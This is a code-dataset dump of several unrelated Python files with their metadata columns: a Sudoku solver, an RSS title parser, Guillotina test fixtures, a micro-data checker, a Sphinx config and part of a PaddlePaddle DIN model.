col_coords = [(x, y) for y in range(9)]
if value in set(self.get(x, y) for x, y in col_coords):
raise ValueError(f"Value {value} is already in the col {x}")
bx = x // 3 * 3
by = y // 3 * 3
sec_coords = [(x, y)
for x in range(bx, bx+3)
for y in range(by, by+3)]
if value in set(self.get(x, y) for x, y in sec_coords):
raise ValueError(f"Value {value} is already in the sector {bx, by}")
# Set the value
self._data[y][x] = value
# Finally, remove from options
self._options[y][x] = set()
for coords in [row_coords, col_coords, sec_coords]:
for x, y in coords:
if value not in self._options[y][x]:
continue
self._options[y][x].remove(value)
def is_solved(self) -> bool:
# Problem is solved when all the cells are filled
return all(self.get(x, y) for x in range(9) for y in range(9))
def is_solvable(self) -> bool:
# Problem is solvable if all empty cells have at least one option
return all(self._options[y][x] for x in range(9) for y in range(9)
if not self.get(x, y))
def copy(self) -> "Problem":
c = Problem()
c._data = deepcopy(self._data)
c._options = deepcopy(self._options)
return c
def format(self) -> str:
out = []
for blockn in range(3):
for line in self._data[blockn*3 : blockn*3+3]:
outline = ""
outline += (" ".join(str(n or " ") for n in line[0:3]))
outline += " | "
outline += (" ".join(str(n or " ") for n in line[3:6]))
outline += " | "
outline += (" ".join(str(n or " ") for n in line[6:9]))
out.append(outline)
if blockn != 2:
out.append("------+-------+------")
return "\n".join(out)
def print(self) -> None:
print(self.format())
class Solver:
def __init__(self, problem: Problem):
self.problem = problem
def solve(self) -> Problem:
while not self.problem.is_solved():
moves = self._get_trivial_moves()
if not moves:
# No trivial moves are left. We have to solve by trials and
# errors.
return self._fork()
for x, y, value in moves:
self.problem.set(x, y, value)
if not self.problem.is_solvable():
raise UnsolvableSudoku()
return self.problem
def _fork(self) -> Problem:
# Find first cell with options
x, y = next(self._get_empty_coords())
opts = self.problem.get_options(x, y)
# Try all options one by one
for candidate in opts:
attempt = self.problem.copy()
attempt.set(x, y, candidate)
subsolver = Solver(attempt)
try:
return subsolver.solve()
except UnsolvableSudoku:
# Didn't work, try another option
continue
# All options exhausted, we can't solve this
raise UnsolvableSudoku()
def _get_trivial_moves(self) -> List[Tuple[int, int, int]]:
moves = []
for x, y in self._get_empty_coords():
opts = self.problem.get_options(x, y)
if len(opts) == 1:
moves.append((x, y, list(opts)[0]))
return moves
def _get_empty_coords(self) -> Iterator[Tuple[int, int]]:
for x in range(9):
for y in range(9):
val = self.problem.get(x, y)
if val:
continue
yield (x, y)
def load_problem(fname: str) -> Problem:
with open(fname, 'r') as f:
probstr = f.read()
return Problem.parse(probstr)
def main() -> None:
problem = load_problem(sys.argv[1])
print("Initial problem:")
problem.print()
solver = Solver(problem)
solved = solver.solve()
print("Solved problem:")
solved.print()
if __name__ == '__main__':
main()
| en | 0.87793 | # See http://lipas.uwasa.fi/~timan/sudoku/ for sample problems # Verify the value # Set the value # Finally, remove from options # Problem is solved when all the cells are filled # Problem is solvable if all empty cells have at least one option # No trivial moves are left. We have to solve by trials and # errors. # Find first cell with options # Try all options one by one # Didn't work, try another option # All options exhausted, we can't solve this | 3.49929 | 3 |
datasets/tracket_num.py | richiesui/Deep-Association-Learning | 70 | 6614028 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
def get_tracket_num(dataset_name):
if dataset_name == 'MARS':
return [1816, 1957, 1321, 750, 1880, 574]
elif dataset_name == 'PRID2011':
return [89, 89]
elif dataset_name == 'iLIDS-VID':
return [150, 150]
else:
raise ValueError('You must supply the dataset name as '
'-- MARS, PRID2011, iLIDS-VID')
| from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
def get_tracket_num(dataset_name):
if dataset_name == 'MARS':
return [1816, 1957, 1321, 750, 1880, 574]
elif dataset_name == 'PRID2011':
return [89, 89]
elif dataset_name == 'iLIDS-VID':
return [150, 150]
else:
raise ValueError('You must supply the dataset name as '
'-- MARS, PRID2011, iLIDS-VID')
| none | 1 | 2.167452 | 2 | |
WebMirror/management/rss_parser_funcs/feed_parse_extractWwwJustreadsNet.py | fake-name/ReadableWebProxy | 193 | 6614029 | <gh_stars>100-1000
def extractWwwJustreadsNet(item):
'''
Parser for 'www.justreads.net'
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return None
titlemap = [
('[ATP] ', 'Accompanying the Phoenix', 'translated'),
('[Q] ', 'Qingge [Rebirth]', 'translated'),
('[AOOO] ', 'The Otherworldly Adventures of a Super Naive Girl', 'translated'),
('[OASNG] ', 'The Otherworldly Adventures of a Super Naive Girl', 'translated'),
('[RJWSHH] ', 'Rebirth: the Journey of a Wife Spoiling Her Husband', 'translated'),
('Master of Dungeon', 'Master of Dungeon', 'oel'),
]
for titlecomponent, name, tl_type in titlemap:
if titlecomponent.lower() in item['title'].lower():
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False | def extractWwwJustreadsNet(item):
'''
Parser for 'www.justreads.net'
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return None
titlemap = [
('[ATP] ', 'Accompanying the Phoenix', 'translated'),
('[Q] ', 'Qingge [Rebirth]', 'translated'),
('[AOOO] ', 'The Otherworldly Adventures of a Super Naive Girl', 'translated'),
('[OASNG] ', 'The Otherworldly Adventures of a Super Naive Girl', 'translated'),
('[RJWSHH] ', 'Rebirth: the Journey of a Wife Spoiling Her Husband', 'translated'),
('Master of Dungeon', 'Master of Dungeon', 'oel'),
]
for titlecomponent, name, tl_type in titlemap:
if titlecomponent.lower() in item['title'].lower():
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False | en | 0.345559 | Parser for 'www.justreads.net' | 2.445191 | 2 |
pyraliddemo/tests/__init__.py | sfarrens/pyraliddemo | 3 | 6614030 | <reponame>sfarrens/pyraliddemo
# -*- coding: utf-8 -*-
"""UNIT TESTS.
Unit testing framework for the package.
"""
| # -*- coding: utf-8 -*-
"""UNIT TESTS.
Unit testing framework for the package.
""" | en | 0.733147 | # -*- coding: utf-8 -*- UNIT TESTS. Unit testing framework for the package. | 1.086566 | 1 |
lab/lab08/tests/Keyboard.py | AnthonyNg404/61A | 0 | 6614031 | test = {
'name': 'Keyboard',
'points': 0,
'suites': [
{
'cases': [
{
'code': r"""
>>> b1 = Button(0, "H")
>>> b2 = Button(1, "I")
>>> k = Keyboard(b1, b2)
>>> k.buttons[0].key
'H'
>>> k.press(1)
'I'
>>> k.press(2) #No button at this position
''
>>> k.typing([0, 1])
'HI'
>>> k.typing([1, 0])
'IH'
>>> b1.times_pressed
2
>>> b2.times_pressed
3
""",
'hidden': False,
'locked': False
}
],
'scored': True,
'setup': '>>> from lab08_extra import *',
'teardown': '',
'type': 'doctest'
}
]
}
| test = {
'name': 'Keyboard',
'points': 0,
'suites': [
{
'cases': [
{
'code': r"""
>>> b1 = Button(0, "H")
>>> b2 = Button(1, "I")
>>> k = Keyboard(b1, b2)
>>> k.buttons[0].key
'H'
>>> k.press(1)
'I'
>>> k.press(2) #No button at this position
''
>>> k.typing([0, 1])
'HI'
>>> k.typing([1, 0])
'IH'
>>> b1.times_pressed
2
>>> b2.times_pressed
3
""",
'hidden': False,
'locked': False
}
],
'scored': True,
'setup': '>>> from lab08_extra import *',
'teardown': '',
'type': 'doctest'
}
]
}
| en | 0.41125 | >>> b1 = Button(0, "H") >>> b2 = Button(1, "I") >>> k = Keyboard(b1, b2) >>> k.buttons[0].key 'H' >>> k.press(1) 'I' >>> k.press(2) #No button at this position '' >>> k.typing([0, 1]) 'HI' >>> k.typing([1, 0]) 'IH' >>> b1.times_pressed 2 >>> b2.times_pressed 3 | 2.569031 | 3 |
guillotina/test_package.py | Qiwn/guillotina | 0 | 6614032 | # this is for testing.py, do not import into other modules
from guillotina import configure
from guillotina import schema
from guillotina.async_util import IAsyncUtility
from guillotina.behaviors.instance import AnnotationBehavior
from guillotina.behaviors.instance import ContextBehavior
from guillotina.behaviors.properties import ContextProperty
from guillotina.content import Item
from guillotina.content import Resource
from guillotina.directives import index_field
from guillotina.directives import metadata
from guillotina.directives import write_permission
from guillotina.exceptions import NoIndexField
from guillotina.fields import CloudFileField
from guillotina.files import BaseCloudFile
from guillotina.files.utils import generate_key
from guillotina.interfaces import IApplication
from guillotina.interfaces import IContainer
from guillotina.interfaces import IExternalFileStorageManager
from guillotina.interfaces import IFile
from guillotina.interfaces import IFileField
from guillotina.interfaces import IIDGenerator
from guillotina.interfaces import IItem
from guillotina.interfaces import IJSONToValue
from guillotina.interfaces import IObjectAddedEvent
from guillotina.interfaces import IRequest
from guillotina.interfaces import IResource
from guillotina.response import HTTPUnprocessableEntity
from guillotina.schema import Object
from guillotina.schema.interfaces import IContextAwareDefaultFactory
from shutil import copyfile
from zope.interface import implementer
from zope.interface import Interface
import json
import os
import tempfile
import typing
app_settings = {
'applications': ['guillotina']
}
TERM_SCHEMA = json.dumps({
'type': 'object',
'properties': {
'label': {'type': 'string'},
'number': {'type': 'number'}
},
})
@implementer(IContextAwareDefaultFactory)
class ContextDefaultFactory:
def __call__(self, context):
return 'foobar'
CATEGORIES_MAPPING = {
'dynamic': False,
'type': 'nested',
}
class IExample(IResource):
metadata('categories')
index_field('boolean_field', type='boolean')
boolean_field = schema.Bool(required=False)
index_field('categories', field_mapping=CATEGORIES_MAPPING)
categories = schema.List(
title='categories',
default=[],
value_type=schema.JSONField(
title='term',
schema=TERM_SCHEMA)
)
textline_field = schema.TextLine(
title='kk', widget='testing', required=False)
text_field = schema.Text(required=False)
dict_value = schema.Dict(
key_type=schema.TextLine(),
value_type=schema.TextLine(),
required=False
)
datetime = schema.Datetime(required=False)
write_permission(write_protected='example.MyPermission')
write_protected = schema.TextLine(
title='Write protected field',
required=False,
)
default_factory_test = schema.Text(
defaultFactory=lambda: 'foobar'
)
context_default_factory_test = schema.Text(
defaultFactory=ContextDefaultFactory()
)
@index_field.with_accessor(
IExample, 'categories_accessor', field='categories')
def categories_index_accessor(ob):
if not ob.categories:
raise NoIndexField
else:
return [
c['label'] for c in ob.categories
]
@index_field.with_accessor(IExample, 'foobar_accessor')
def foobar_accessor(ob):
return 'foobar'
configure.permission('example.MyPermission', 'example permission')
@implementer(IExample)
class Example(Resource):
pass
class IMarkerBehavior(Interface):
pass
class ITestBehavior(Interface):
foobar = schema.TextLine(required=False)
foobar_context = schema.TextLine(required=False, default='default-foobar')
@configure.behavior(
title="",
provides=ITestBehavior,
marker=IMarkerBehavior,
for_="guillotina.interfaces.IResource")
class GTestBehavior(AnnotationBehavior):
foobar_context = ContextProperty('foobar_context')
class ITestContextBehavior(Interface):
foobar = schema.TextLine()
class IMarkerTestContextBehavior(Interface):
pass
@configure.behavior(
title="",
provides=ITestContextBehavior,
marker=IMarkerTestContextBehavior,
for_="guillotina.interfaces.IResource")
class GContextTestBehavior(ContextBehavior):
pass
class ITestNoSerializeBehavior(Interface):
foobar = schema.TextLine()
@configure.behavior(
title="",
provides=ITestNoSerializeBehavior,
for_="guillotina.interfaces.IResource")
class GTestNoSerializeBehavior(ContextBehavior):
auto_serialize = False
class IFileContent(IItem):
file = CloudFileField(required=False)
@configure.contenttype(
schema=IFileContent, type_name="File",
behaviors=[
"guillotina.behaviors.dublincore.IDublinCore"
])
class FileContent(Item):
pass
@configure.subscriber(
for_=(IFileContent, IObjectAddedEvent), priority=-1000)
async def foobar_sub(ob, evt):
pass
@configure.subscriber(
for_=(IResource, IObjectAddedEvent), priority=-1000)
def sync_foobar_sub(ob, evt):
if not hasattr(evt, 'called'):
evt.called = 0
evt.called += 1
configure.register_configuration(Example, dict(
context=IContainer,
schema=IExample,
type_name="Example",
behaviors=[
"guillotina.behaviors.dublincore.IDublinCore"
]
), 'contenttype')
@configure.service(
context=IApplication, method='GET', permission='guillotina.AccessContent',
name='@raise-http-exception')
@configure.service(
context=IApplication, method='POST', permission='guillotina.AccessContent',
name='@raise-http-exception')
async def raise_http_exception(context, request):
raise HTTPUnprocessableEntity()
class ITestAsyncUtility(IAsyncUtility):
pass
@configure.utility(provides=ITestAsyncUtility)
class AsyncUtility:
def __init__(self, settings=None, loop=None):
self.state = 'init'
async def initialize(self):
self.state = 'initialize'
async def finalize(self):
self.state = 'finalize'
@configure.service(
context=IApplication, method='GET', permission='guillotina.AccessContent',
name='@match/{foo}/{bar}')
async def matching_service(context, request):
return request.matchdict
@configure.adapter(
for_=Interface,
provides=IIDGenerator)
class IDGenerator(object):
"""
Test id generator
"""
def __init__(self, request):
self.request = request
def __call__(self, data):
if 'bad-id' in data:
return data['bad-id']
if 'custom-id' in data:
return data['custom-id']
class IMemoryFileField(IFileField):
"""
"""
class IInMemoryCloudFile(IFile):
"""
"""
@configure.adapter(
for_=(dict, IMemoryFileField),
provides=IJSONToValue)
def dictfile_converter(value, field):
return MemoryFile(**value)
@implementer(IInMemoryCloudFile)
class MemoryFile(BaseCloudFile):
"""File stored in a GCloud, with a filename."""
_chunks = 0
_size = 0
@property
def chunks(self):
return self._chunks
@property
def size(self):
return self._size
@size.setter
def size(self, val):
self._size = val
_tmp_files: typing.Dict = {}
@configure.adapter(
for_=(IResource, IRequest, IMemoryFileField),
provides=IExternalFileStorageManager)
class InMemoryFileManager:
file_class = MemoryFile
def __init__(self, context, request, field):
self.context = context
self.request = request
self.field = field
async def iter_data(self, uri=None):
if uri is None:
file = self.field.get(self.field.context or self.context)
uri = file.uri
with open(_tmp_files[uri], 'rb') as fi:
chunk = fi.read(1024)
while chunk:
yield chunk
chunk = fi.read(1024)
async def start(self, dm):
upload_file_id = dm.get('upload_file_id')
if upload_file_id is not None:
await self.delete_upload(upload_file_id)
upload_file_id = generate_key(self.context)
_tmp_files[upload_file_id] = tempfile.mkstemp()[1]
await dm.update(
_chunks=0,
upload_file_id=upload_file_id
)
async def delete_upload(self, uri):
if uri in _tmp_files:
if os.path.exists(_tmp_files[uri]):
os.remove(_tmp_files[uri])
del _tmp_files[uri]
async def append(self, dm, iterable, offset) -> int:
count = 0
file_id = dm.get('upload_file_id')
chunk_count = dm.get('_chunks')
with open(_tmp_files[file_id], 'ab') as fi:
async for chunk in iterable:
if chunk:
fi.write(chunk)
count += len(chunk)
chunk_count += 1
await dm.update(_chunks=chunk_count)
return count
async def finish(self, dm):
await dm.update(
uri=dm.get('upload_file_id'),
upload_file_id=None
)
async def exists(self):
file = self.field.get(self.field.context or self.context)
return file.uri in _tmp_files and os.path.exists(_tmp_files[file.uri])
async def copy(self, to_storage_manager, to_dm):
file = self.field.get(self.field.context or self.context)
new_uri = generate_key(self.context)
_tmp_files[new_uri] = _tmp_files[file.uri]
_tmp_files[new_uri] = tempfile.mkstemp()[1]
copyfile(_tmp_files[file.uri], _tmp_files[new_uri])
await to_dm.finish(
values={
'content_type': file.content_type,
'size': file.size,
'uri': new_uri,
'filename': file.filename or 'unknown'
}
)
@implementer(IMemoryFileField)
class InMemoryFileField(Object):
"""A NamedBlobFile field."""
_type = MemoryFile
schema = IInMemoryCloudFile
def __init__(self, **kw):
if 'schema' in kw:
self.schema = kw.pop('schema')
super(InMemoryFileField, self).__init__(schema=self.schema, **kw)
| # this is for testing.py, do not import into other modules
from guillotina import configure
from guillotina import schema
from guillotina.async_util import IAsyncUtility
from guillotina.behaviors.instance import AnnotationBehavior
from guillotina.behaviors.instance import ContextBehavior
from guillotina.behaviors.properties import ContextProperty
from guillotina.content import Item
from guillotina.content import Resource
from guillotina.directives import index_field
from guillotina.directives import metadata
from guillotina.directives import write_permission
from guillotina.exceptions import NoIndexField
from guillotina.fields import CloudFileField
from guillotina.files import BaseCloudFile
from guillotina.files.utils import generate_key
from guillotina.interfaces import IApplication
from guillotina.interfaces import IContainer
from guillotina.interfaces import IExternalFileStorageManager
from guillotina.interfaces import IFile
from guillotina.interfaces import IFileField
from guillotina.interfaces import IIDGenerator
from guillotina.interfaces import IItem
from guillotina.interfaces import IJSONToValue
from guillotina.interfaces import IObjectAddedEvent
from guillotina.interfaces import IRequest
from guillotina.interfaces import IResource
from guillotina.response import HTTPUnprocessableEntity
from guillotina.schema import Object
from guillotina.schema.interfaces import IContextAwareDefaultFactory
from shutil import copyfile
from zope.interface import implementer
from zope.interface import Interface
import json
import os
import tempfile
import typing
app_settings = {
'applications': ['guillotina']
}
TERM_SCHEMA = json.dumps({
'type': 'object',
'properties': {
'label': {'type': 'string'},
'number': {'type': 'number'}
},
})
@implementer(IContextAwareDefaultFactory)
class ContextDefaultFactory:
def __call__(self, context):
return 'foobar'
CATEGORIES_MAPPING = {
'dynamic': False,
'type': 'nested',
}
class IExample(IResource):
metadata('categories')
index_field('boolean_field', type='boolean')
boolean_field = schema.Bool(required=False)
index_field('categories', field_mapping=CATEGORIES_MAPPING)
categories = schema.List(
title='categories',
default=[],
value_type=schema.JSONField(
title='term',
schema=TERM_SCHEMA)
)
textline_field = schema.TextLine(
title='kk', widget='testing', required=False)
text_field = schema.Text(required=False)
dict_value = schema.Dict(
key_type=schema.TextLine(),
value_type=schema.TextLine(),
required=False
)
datetime = schema.Datetime(required=False)
write_permission(write_protected='example.MyPermission')
write_protected = schema.TextLine(
title='Write protected field',
required=False,
)
default_factory_test = schema.Text(
defaultFactory=lambda: 'foobar'
)
context_default_factory_test = schema.Text(
defaultFactory=ContextDefaultFactory()
)
@index_field.with_accessor(
IExample, 'categories_accessor', field='categories')
def categories_index_accessor(ob):
if not ob.categories:
raise NoIndexField
else:
return [
c['label'] for c in ob.categories
]
@index_field.with_accessor(IExample, 'foobar_accessor')
def foobar_accessor(ob):
return 'foobar'
configure.permission('example.MyPermission', 'example permission')
@implementer(IExample)
class Example(Resource):
pass
class IMarkerBehavior(Interface):
pass
class ITestBehavior(Interface):
foobar = schema.TextLine(required=False)
foobar_context = schema.TextLine(required=False, default='default-foobar')
@configure.behavior(
title="",
provides=ITestBehavior,
marker=IMarkerBehavior,
for_="guillotina.interfaces.IResource")
class GTestBehavior(AnnotationBehavior):
foobar_context = ContextProperty('foobar_context')
class ITestContextBehavior(Interface):
foobar = schema.TextLine()
class IMarkerTestContextBehavior(Interface):
pass
@configure.behavior(
title="",
provides=ITestContextBehavior,
marker=IMarkerTestContextBehavior,
for_="guillotina.interfaces.IResource")
class GContextTestBehavior(ContextBehavior):
pass
class ITestNoSerializeBehavior(Interface):
foobar = schema.TextLine()
@configure.behavior(
title="",
provides=ITestNoSerializeBehavior,
for_="guillotina.interfaces.IResource")
class GTestNoSerializeBehavior(ContextBehavior):
auto_serialize = False
class IFileContent(IItem):
file = CloudFileField(required=False)
@configure.contenttype(
schema=IFileContent, type_name="File",
behaviors=[
"guillotina.behaviors.dublincore.IDublinCore"
])
class FileContent(Item):
pass
@configure.subscriber(
for_=(IFileContent, IObjectAddedEvent), priority=-1000)
async def foobar_sub(ob, evt):
pass
@configure.subscriber(
for_=(IResource, IObjectAddedEvent), priority=-1000)
def sync_foobar_sub(ob, evt):
if not hasattr(evt, 'called'):
evt.called = 0
evt.called += 1
configure.register_configuration(Example, dict(
context=IContainer,
schema=IExample,
type_name="Example",
behaviors=[
"guillotina.behaviors.dublincore.IDublinCore"
]
), 'contenttype')
@configure.service(
context=IApplication, method='GET', permission='guillotina.AccessContent',
name='@raise-http-exception')
@configure.service(
context=IApplication, method='POST', permission='guillotina.AccessContent',
name='@raise-http-exception')
async def raise_http_exception(context, request):
raise HTTPUnprocessableEntity()
class ITestAsyncUtility(IAsyncUtility):
pass
@configure.utility(provides=ITestAsyncUtility)
class AsyncUtility:
def __init__(self, settings=None, loop=None):
self.state = 'init'
async def initialize(self):
self.state = 'initialize'
async def finalize(self):
self.state = 'finalize'
@configure.service(
context=IApplication, method='GET', permission='guillotina.AccessContent',
name='@match/{foo}/{bar}')
async def matching_service(context, request):
return request.matchdict
@configure.adapter(
for_=Interface,
provides=IIDGenerator)
class IDGenerator(object):
"""
Test id generator
"""
def __init__(self, request):
self.request = request
def __call__(self, data):
if 'bad-id' in data:
return data['bad-id']
if 'custom-id' in data:
return data['custom-id']
class IMemoryFileField(IFileField):
"""
"""
class IInMemoryCloudFile(IFile):
"""
"""
@configure.adapter(
for_=(dict, IMemoryFileField),
provides=IJSONToValue)
def dictfile_converter(value, field):
return MemoryFile(**value)
@implementer(IInMemoryCloudFile)
class MemoryFile(BaseCloudFile):
"""File stored in a GCloud, with a filename."""
_chunks = 0
_size = 0
@property
def chunks(self):
return self._chunks
@property
def size(self):
return self._size
@size.setter
def size(self, val):
self._size = val
_tmp_files: typing.Dict = {}
@configure.adapter(
for_=(IResource, IRequest, IMemoryFileField),
provides=IExternalFileStorageManager)
class InMemoryFileManager:
file_class = MemoryFile
def __init__(self, context, request, field):
self.context = context
self.request = request
self.field = field
async def iter_data(self, uri=None):
if uri is None:
file = self.field.get(self.field.context or self.context)
uri = file.uri
with open(_tmp_files[uri], 'rb') as fi:
chunk = fi.read(1024)
while chunk:
yield chunk
chunk = fi.read(1024)
async def start(self, dm):
upload_file_id = dm.get('upload_file_id')
if upload_file_id is not None:
await self.delete_upload(upload_file_id)
upload_file_id = generate_key(self.context)
_tmp_files[upload_file_id] = tempfile.mkstemp()[1]
await dm.update(
_chunks=0,
upload_file_id=upload_file_id
)
async def delete_upload(self, uri):
if uri in _tmp_files:
if os.path.exists(_tmp_files[uri]):
os.remove(_tmp_files[uri])
del _tmp_files[uri]
async def append(self, dm, iterable, offset) -> int:
count = 0
file_id = dm.get('upload_file_id')
chunk_count = dm.get('_chunks')
with open(_tmp_files[file_id], 'ab') as fi:
async for chunk in iterable:
if chunk:
fi.write(chunk)
count += len(chunk)
chunk_count += 1
await dm.update(_chunks=chunk_count)
return count
async def finish(self, dm):
await dm.update(
uri=dm.get('upload_file_id'),
upload_file_id=None
)
async def exists(self):
file = self.field.get(self.field.context or self.context)
return file.uri in _tmp_files and os.path.exists(_tmp_files[file.uri])
async def copy(self, to_storage_manager, to_dm):
file = self.field.get(self.field.context or self.context)
new_uri = generate_key(self.context)
_tmp_files[new_uri] = _tmp_files[file.uri]
_tmp_files[new_uri] = tempfile.mkstemp()[1]
copyfile(_tmp_files[file.uri], _tmp_files[new_uri])
await to_dm.finish(
values={
'content_type': file.content_type,
'size': file.size,
'uri': new_uri,
'filename': file.filename or 'unknown'
}
)
@implementer(IMemoryFileField)
class InMemoryFileField(Object):
"""A NamedBlobFile field."""
_type = MemoryFile
schema = IInMemoryCloudFile
def __init__(self, **kw):
if 'schema' in kw:
self.schema = kw.pop('schema')
super(InMemoryFileField, self).__init__(schema=self.schema, **kw)
| en | 0.721817 | # this is for testing.py, do not import into other modules Test id generator File stored in a GCloud, with a filename. A NamedBlobFile field. | 1.609483 | 2 |
apps/indicators/micro.py | suenklerhaw/seoeffekt | 1 | 6614033 | #script to check micro data
#include libs
import sys
sys.path.insert(0, '..')
from include import *
micro_file = '../../evaluations/micro.csv'
today = date.today()
def get_micros():
micros_list = []
with open(micro_file, 'r') as csvfile:
micros = csv.reader(csvfile)
for m in micros:
modul = m[0]
pattern = m[1]
item = (modul, pattern)
micros_list.append(item)
return micros_list
def micros(hash, html_comments, html_source):
micros_list = get_micros()
micros_save = []
for ms in micros_list:
obj = ms[0]
pattern = ms[1]
for comment in html_comments:
if(len(comment) < 3000):
if Helpers.matchText(comment, pattern):
micros_save.append([obj])
for s in html_source:
if(len(s) < 3000):
if Helpers.matchText(s, pattern):
micros_save.append([obj])
micros_save = Helpers.remove_duplicates_from_list(micros_save)
res = ''
if(len(micros_save) == 0):
module = 'micros'
value = '0'
check_evaluations_result(hash, module, value)
module = 'micros counter'
value = '0'
check_evaluations_result(hash, module, value)
else:
for m in micros_save:
res = '#'+res+m[0]
module = 'micros'
check_evaluations_result(hash, module, res)
module = 'micros counter'
value = len(micros_save)
value = str(value)
check_evaluations_result(hash, module, value)
| #script to check micro data
#include libs
import sys
sys.path.insert(0, '..')
from include import *
micro_file = '../../evaluations/micro.csv'
today = date.today()
def get_micros():
micros_list = []
with open(micro_file, 'r') as csvfile:
micros = csv.reader(csvfile)
for m in micros:
modul = m[0]
pattern = m[1]
item = (modul, pattern)
micros_list.append(item)
return micros_list
def micros(hash, html_comments, html_source):
micros_list = get_micros()
micros_save = []
for ms in micros_list:
obj = ms[0]
pattern = ms[1]
for comment in html_comments:
if(len(comment) < 3000):
if Helpers.matchText(comment, pattern):
micros_save.append([obj])
for s in html_source:
if(len(s) < 3000):
if Helpers.matchText(s, pattern):
micros_save.append([obj])
micros_save = Helpers.remove_duplicates_from_list(micros_save)
res = ''
if(len(micros_save) == 0):
module = 'micros'
value = '0'
check_evaluations_result(hash, module, value)
module = 'micros counter'
value = '0'
check_evaluations_result(hash, module, value)
else:
for m in micros_save:
res = '#'+res+m[0]
module = 'micros'
check_evaluations_result(hash, module, res)
module = 'micros counter'
value = len(micros_save)
value = str(value)
check_evaluations_result(hash, module, value)
| en | 0.392964 | #script to check micro data #include libs | 2.898424 | 3 |
docs/conf.py | kamilazdybal/multipy | 0 | 6614034 | <filename>docs/conf.py
# -- Path setup --------------------------------------------------------------
import os
import sys
sys.path.insert(0, os.path.abspath('../multipy/'))
# -- Project information -----------------------------------------------------
project = 'multipy'
copyright = '2021-2022, <NAME>, <NAME>'
author = '<NAME>, <NAME>'
release = '1.0.0'
extensions = [
"sphinx.ext.autodoc",
]
autosectionlabel_prefix_document = True
templates_path = ['_templates']
source_suffix = '.rst'
master_doc = 'index'
language = 'English'
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
pygments_style = 'sphinx'
html_static_path = []
# import jupyter_sphinx_theme
# html_theme = "jupyter"
# html_sidebars = {'**': ['sidebartoc.html']}
# html_theme_path = jupyter_sphinx_theme.get_html_theme_path()
html_theme = "furo"
html_logo = "images/multipy-logo.svg"
html_theme_options = {
"dark_css_variables": {
"color-problematic": "#b30000",
"color-foreground-primary": "black",
"color-foreground-secondary": "#5a5c63",
"color-foreground-muted": "#72747e",
"color-foreground-border": "#878787",
"color-background-primary": "white",
"color-background-secondary": "#f8f9fb",
"color-background-hover": "#efeff4ff",
"color-background-hover--transparent": "#efeff400",
"color-background-border": "#eeebee",
"color-inline-code-background": "#f2f2f2",
# Announcements
"color-announcement-background": "#000000dd",
"color-announcement-text": "#eeebee",
# Brand colors
"color-brand-primary": "#2962ff",
"color-brand-content": "#2a5adf",
# Highlighted text (search)
"color-highlighted-background": "#ddeeff",
# GUI Labels
"color-guilabel-background": "#ddeeff80",
"color-guilabel-border": "#bedaf580",
# API documentation
"color-api-highlight-on-target": "#ffffcc",
# Admonitions
"color-admonition-background": "transparent",
},
}
| <filename>docs/conf.py
# -- Path setup --------------------------------------------------------------
import os
import sys
sys.path.insert(0, os.path.abspath('../multipy/'))
# -- Project information -----------------------------------------------------
project = 'multipy'
copyright = '2021-2022, <NAME>, <NAME>'
author = '<NAME>, <NAME>'
release = '1.0.0'
extensions = [
"sphinx.ext.autodoc",
]
autosectionlabel_prefix_document = True
templates_path = ['_templates']
source_suffix = '.rst'
master_doc = 'index'
language = 'English'
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
pygments_style = 'sphinx'
html_static_path = []
# import jupyter_sphinx_theme
# html_theme = "jupyter"
# html_sidebars = {'**': ['sidebartoc.html']}
# html_theme_path = jupyter_sphinx_theme.get_html_theme_path()
html_theme = "furo"
html_logo = "images/multipy-logo.svg"
html_theme_options = {
"dark_css_variables": {
"color-problematic": "#b30000",
"color-foreground-primary": "black",
"color-foreground-secondary": "#5a5c63",
"color-foreground-muted": "#72747e",
"color-foreground-border": "#878787",
"color-background-primary": "white",
"color-background-secondary": "#f8f9fb",
"color-background-hover": "#efeff4ff",
"color-background-hover--transparent": "#efeff400",
"color-background-border": "#eeebee",
"color-inline-code-background": "#f2f2f2",
# Announcements
"color-announcement-background": "#000000dd",
"color-announcement-text": "#eeebee",
# Brand colors
"color-brand-primary": "#2962ff",
"color-brand-content": "#2a5adf",
# Highlighted text (search)
"color-highlighted-background": "#ddeeff",
# GUI Labels
"color-guilabel-background": "#ddeeff80",
"color-guilabel-border": "#bedaf580",
# API documentation
"color-api-highlight-on-target": "#ffffcc",
# Admonitions
"color-admonition-background": "transparent",
},
}
| en | 0.362554 | # -- Path setup -------------------------------------------------------------- # -- Project information ----------------------------------------------------- # import jupyter_sphinx_theme # html_theme = "jupyter" # html_sidebars = {'**': ['sidebartoc.html']} # html_theme_path = jupyter_sphinx_theme.get_html_theme_path() # Announcements # Brand colors # Highlighted text (search) # GUI Labels # API documentation # Admonitions | 1.545231 | 2 |
models/rank/din/net.py | Edouard87ljt5s/DisyInformationssysteme0 | 2 | 6614035 | <gh_stars>1-10
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from paddle.nn import Conv1D
import paddle
import paddle.nn as nn
import math
import numpy as np
class DINLayer(nn.Layer):
def __init__(self, item_emb_size, cat_emb_size, act, is_sparse,
use_DataLoader, item_count, cat_count):
super(DINLayer, self).__init__()
self.item_emb_size = item_emb_size
self.cat_emb_size = cat_emb_size
self.act = act
self.is_sparse = is_sparse
self.use_DataLoader = use_DataLoader
self.item_count = item_count
self.cat_count = cat_count
self.hist_item_emb_attr = paddle.nn.Embedding(
self.item_count,
self.item_emb_size,
sparse=self.is_sparse,
weight_attr=paddle.framework.ParamAttr(
initializer=paddle.nn.initializer.XavierUniform()),
name="item_emb")
self.hist_cat_emb_attr = paddle.nn.Embedding(
